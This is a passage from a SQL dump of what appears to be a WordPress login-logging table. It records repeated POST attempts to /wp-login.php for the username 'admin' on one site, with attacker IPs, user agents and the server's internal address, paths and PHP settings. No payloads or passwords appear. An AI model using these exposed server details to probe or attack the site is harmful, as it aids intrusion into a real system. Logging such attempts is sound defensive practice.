00:00:00'),(95607,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53368\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.193\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747024539.465255;s:12:\"REQUEST_TIME\";i:1747024539;}}','162.0.232.193',0,'2025-05-12 10:05:41','1970-01-01 00:00:00'),(95608,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32015\";s:11:\"REMOTE_ADDR\";s:14:\"20.245.238.242\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747024871.1825809;s:12:\"REQUEST_TIME\";i:1747024871;}}','20.245.238.242',0,'2025-05-12 10:11:12','1970-01-01 00:00:00'),(95609,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46948\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.125.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747025204.874228;s:12:\"REQUEST_TIME\";i:1747025204;}}','198.54.125.78',0,'2025-05-12 10:16:46','1970-01-01 00:00:00'),(95610,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47618\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.133\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747025533.8346541;s:12:\"REQUEST_TIME\";i:1747025533;}}','199.188.200.133',0,'2025-05-12 10:22:15','1970-01-01 00:00:00'),(95611,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37882\";s:11:\"REMOTE_ADDR\";s:11:\"34.93.16.66\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747025869.1781459;s:12:\"REQUEST_TIME\";i:1747025869;}}','34.93.16.66',0,'2025-05-12 10:27:50','1970-01-01 00:00:00'),(95612,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39162\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.180\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747026199.8288939;s:12:\"REQUEST_TIME\";i:1747026199;}}','162.0.209.180',0,'2025-05-12 10:33:21','1970-01-01 00:00:00'),(95613,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"13822\";s:11:\"REMOTE_ADDR\";s:14:\"35.238.203.213\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747026528.904448;s:12:\"REQUEST_TIME\";i:1747026528;}}','35.238.203.213',0,'2025-05-12 10:38:50','1970-01-01 00:00:00'),(95614,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42106\";s:11:\"REMOTE_ADDR\";s:14:\"185.229.21.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747026863.90751;s:12:\"REQUEST_TIME\";i:1747026863;}}','185.229.21.118',0,'2025-05-12 10:44:25','1970-01-01 00:00:00'),(95615,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56310\";s:11:\"REMOTE_ADDR\";s:14:\"162.254.39.130\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747027196.122611;s:12:\"REQUEST_TIME\";i:1747027196;}}','162.254.39.130',0,'2025-05-12 10:49:57','1970-01-01 00:00:00'),(95616,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45158\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747027523.8988819;s:12:\"REQUEST_TIME\";i:1747027523;}}','66.102.132.28',0,'2025-05-12 10:55:25','1970-01-01 00:00:00'),(95617,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59540\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";